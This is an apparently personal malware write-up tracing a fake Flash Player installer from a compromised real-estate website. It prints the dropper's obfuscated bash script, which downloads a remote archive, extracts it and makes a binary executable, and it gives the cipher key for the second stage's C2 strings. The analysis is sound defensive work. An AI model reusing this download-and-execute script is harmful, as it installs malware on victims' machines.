In this article, I will walk you through malware analysis distributed by a hacked website.

I was searching for a new place to live in LA on Zillow and found an interesting location. The contact for it was Jesse Weinberg from Keller Williams Silicon Beach.

I googled this guy and the first result was In fact, this is the website they list on their Facebook.

If you click on Search For Properties in Your Area in Chrome, you will be redirected to Flash download page that will automatically download Adobe Flash Player.dmg.


I used to convert .dmg into a .zip to avoid autoruns.

After unzipping the file, I saw the usuall contents of the dmg archive, however the install script was just a bash script:

With the following content:


dlUrl="http://${dlDomain}/${dlPath}/$(echo "YlcxVGRIVmlMblJoY2k1bmVnbz0K" | openssl base64 -d -A | openssl base64 -d -A)?ts=$(date +%s)"
binPath="${dir}/$(echo "YlcwdGFXNXpkR0ZzYkMxdFlXTnZjeTVoY0hBdlEyOXVkR1Z1ZEhNdlRXRmpUMU12YlcwdGFXNXpkR0ZzYkMxdFlXTnZjd289Cg==" | openssl base64 -d -A | openssl base64 -d -A)"
rm -rf "${dir}"
mkdir -p "${dir}"
curl -s -L -o "${dir}/stmp.tar.gz" "${dlUrl}"
tar -xvzf "${dir}/stmp.tar.gz" -C "${dir}"
chmod +x "${binPath}"

Essentially what this does is:

  1. Download
  2. Extract it
  3. Execute

These are the contents of mmStub.tar.gz

After checking the binary with IDA Pro, I see that it was written in Objective-C. Which is both a tip and a pain in the ass. The tip lies in the fact that some of the class names can be deobfuscated easily. The main in the ass is to track the X-Refs due to Objective-C messaging system - following an execution flow is tricky.


I see there are some obfuscated strings. It appears that the author didn't try to obfuscate program's code, but instead obfuscated the C2C urls. As I mentioned above, we can see class names, and luckily there is a class specifically for encrypting and decrypting strings. Below is a screenshot of a function that decrypts a single byte, and wait for it.... it's a Vigenere ciper. Lol.
Looking for the key doesn't take long either. If you stare a little at the assembly it will come to you.
The class is being initialized with the key 1522855729. I threw together a simple Python script and went on decrypting. You can see it here.


The malware's C2C lives on subdomains of For example, the actual useful payload can be found at
Which does nothing else but its adware stuff:
Nothing interesting.

Looking at the string one more time in the 2nd stage shows us this:

The only guy with this username on internet is this one:

Maybe just a bad concidence, but my bet its a bad opsec, just like his malware.